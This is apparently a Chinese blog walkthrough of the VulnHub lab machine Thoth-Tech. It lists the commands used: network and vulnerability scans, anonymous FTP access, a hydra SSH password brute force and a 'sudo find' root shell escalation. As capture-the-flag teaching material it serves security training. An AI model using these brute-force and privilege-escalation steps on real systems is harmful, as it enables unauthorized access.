下载地址:https://download.vulnhub.com/thothtech/Thoth-Tech.ova
主机发现
arp-scan -l
![](https://img-blog.csdnimg.cn/0ee04bb7cf734a00b286633b8479c197.png)
目标:192.168.21.148
端口扫描
nmap --min-rate 10000 -p- 192.168.21.148
![](https://img-blog.csdnimg.cn/41aa21492b6e4893a2263593d045dc6c.png)
服务扫描
nmap -sV -sT -O -p21,22,80 192.168.21.148
![](https://img-blog.csdnimg.cn/fb0bab0944fc4907858678fa71d4c609.png)
漏洞扫描
nmap --script=vuln -p21,22,80 192.168.21.148
![](https://img-blog.csdnimg.cn/ba1e51a89e634c39a606eaef1122d1e5.png)
先去看web网站
![](https://img-blog.csdnimg.cn/efafbb7be2554d6c8b9a01f7190684f2.png)
在f12里面发现
![](https://img-blog.csdnimg.cn/c458dde081b64bf1b809cde9e93ad812.png)
再去看看web的别的
![](https://img-blog.csdnimg.cn/498be2a2a25f4de88f0acf8f0859c4a6.png)
![](https://img-blog.csdnimg.cn/1a32a8f16d034e91a092a0c487344ad7.png)
感觉少了点东西于是又扫了一遍
nmap -A 192.168.21.148
![](https://img-blog.csdnimg.cn/397e0bc1909145b58f54052eb3797a33.png)
发现ftp能匿名登入
去看看(用户名anonymous)
ftp 192.168.21.148![](https://img-blog.csdnimg.cn/a978642d6f3046eb9000de3be4418095.png)
![](https://img-blog.csdnimg.cn/675ccd7142a54528b89d82f23b215822.png)
这里告诉我们pwnlab能爆破
hydra -l pwnlab -P /usr/share/wordlists/rockyou.txt ssh://192.168.21.148
![](https://img-blog.csdnimg.cn/5c1c9fe199074ba9a65c2644f731c35e.png)
ssh登入
ssh pwnlab@192.168.21.148
![](https://img-blog.csdnimg.cn/1aad8d7c400b425dbb0c67eef257de4e.png)
第一个flag
![](https://img-blog.csdnimg.cn/ad4fe7c60866481d8a818cc1cb104c9f.png)
信息收集
![](https://img-blog.csdnimg.cn/1b5e330a5bb04f7882d009cb8da275c5.png)
10和11是我执行的发现有find
![](https://img-blog.csdnimg.cn/8297f4cec6594cf299d910871c24dbd7.png)
这里用find找可执行的文件
find / -user root -perm /40000 2>/dev/null
没有东西
![](https://img-blog.csdnimg.cn/59ad1c18654a47e6af3aaf39d2be926d.png)
再看看sudo
![](https://img-blog.csdnimg.cn/9f43b2382e234b958b5dea7c3911aad2.png)
find没有密码要求,那么就需要利用这个来提权了
find 命令提权 - 编程猎人 (programminghunter.com)
sudo find . -exec /bin/sh \; -quit
![](https://img-blog.csdnimg.cn/8092b84fbb584d239732e85a79c6f484.png)
![](https://img-blog.csdnimg.cn/1956a3ad7d204798864247205991b2f7.png)
结束